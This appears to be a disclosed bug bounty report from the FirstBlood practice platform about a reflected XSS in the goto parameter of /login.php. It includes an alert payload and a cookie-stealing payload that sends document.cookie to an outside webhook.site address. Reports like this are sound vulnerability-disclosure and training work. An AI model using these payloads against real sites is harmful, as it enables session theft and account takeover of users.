FirstBlood-#579Reflective XSS on /login.php?goto=
This issue was discovered on FirstBlood v2.0.0 (issues patched)



On 2021-10-26, th4nu0x0 Level 2 reported:

Summary:

Hey, I have found a reflective cross-site scripting on /login.php?goto= which has a potential of steal cookies which can lead to account takeover of higher privilege accounts when the user visits the malicious link.

Payload:

  • Alerts 1: "onmouseleave=confirm`1`//
  • To Steal Cookies: "onmouseleave="window.location.href=`https://webhook.site/ff9a5b6d-720c-4e25-8abf-656b645cbe74/${document.cookie}`"//

Steps To Reproduce:

Impact:

An attacker use this vulnerability to inject malicious JavaScript and steal cookies of users.

P3 Medium

Endpoint: /login.php

Parameter: goto

Payload: "onmouseleave=confirm`1`//


FirstBlood ID: 26
Vulnerability Type: Reflective XSS

The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (ID 39), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.